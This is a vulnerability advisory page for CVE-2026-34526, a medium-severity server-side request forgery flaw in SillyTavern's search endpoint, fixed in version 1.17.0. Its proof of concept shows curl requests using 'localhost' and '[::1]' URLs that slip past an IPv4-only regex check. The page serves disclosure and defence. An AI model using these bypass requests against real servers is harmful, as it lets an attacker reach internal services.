CVE-2026-34526

MEDIUM
2026-04-01 https://github.com/SillyTavern/SillyTavern GHSA-wm7j-m6jm-8797
5.0
CVSS 3.1
Share

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

3
Patch Released
Apr 02, 2026 - 02:30 nvd
Patch available
Analysis Generated
Apr 01, 2026 - 22:16 vuln.today
CVE Published
Apr 01, 2026 - 21:42 nvd
MEDIUM 5.0

Tags

SSRF CSRF

Description

### Details Distinct from CVE-2025-59159 and CVE-2026-26286 (all fixed in v1.16.0). This endpoint is still unpatched. In `src/endpoints/search.js` line 419, the hostname is checked against `/^\d+\.\d+\.\d+\.\d+$/`. This only matches literal dotted-quad IPv4 (e.g. `127.0.0.1`, `10.0.0.1`). It does not catch: - `localhost` (hostname, not dotted-quad) - `[::1]` (IPv6 loopback) - DNS names resolving to internal addresses (e.g. `localtest.me` -> 127.0.0.1) A separate port check (`urlObj.port !== ''`) limits exploitation to services on default ports (80/443), making this lower severity than a fully unrestricted SSRF. ### PoC 1. Start SillyTavern v1.16.0 normally 2. Send requests to compare blocked vs bypassed (requires a valid session cookie or CSRF disabled): ```bash # Blocked - dotted-quad matched by regex curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \ -H "Content-Type: application/json" \ -d '{"url": "http://127.0.0.1/", "html": true}' # Returns: 400 (blocked) # Bypassed - "localhost" is not dotted-quad curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \ -H "Content-Type: application/json" \ -d '{"url": "http://localhost/", "html": true}' # Returns: 500 (passed validation, fetch attempted, ECONNREFUSED because nothing on port 80) # Bypassed - IPv6 loopback is not dotted-quad curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \ -H "Content-Type: application/json" \ -d '{"url": "http://[::1]/", "html": true}' # Returns: 500 (passed validation, fetch attempted) ``` The 400 vs 500 difference confirms `localhost` and `[::1]` pass the IP check. The 500 is ECONNREFUSED (nothing listening on port 80), not a validation rejection. ### Impact Server-side request forgery with partial restrictions. An authenticated user can force the server to fetch from internal hosts on default ports (80/443) using hostnames or IPv6 addresses that bypass the IP check. The full response body is returned. Lower severity than a fully unrestricted SSRF due to the port limitation. ## Resolution The issue was addressed in version 1.17.0 by improving IPv6 address validation

Analysis

Server-side request forgery in SillyTavern's search endpoint allows authenticated users to bypass hostname validation and force the server to fetch from internal hosts on default ports (80/443) using alternative hostname representations. The vulnerability exists in v1.16.0 and earlier because the IPv4 validation regex only matches literal dotted-quad notation (e.g., 127.0.0.1), failing to block localhost, IPv6 loopback ([::1]), or DNS names resolving to internal addresses. …

Sign in for full analysis, threat intelligence, and remediation guidance.

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

Sign in - Free

Priority Score

25
Low Medium High Critical
KEV: 0
EPSS: +0.0
CVSS: +25
POC: 0

Share

CVE-2026-34526 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy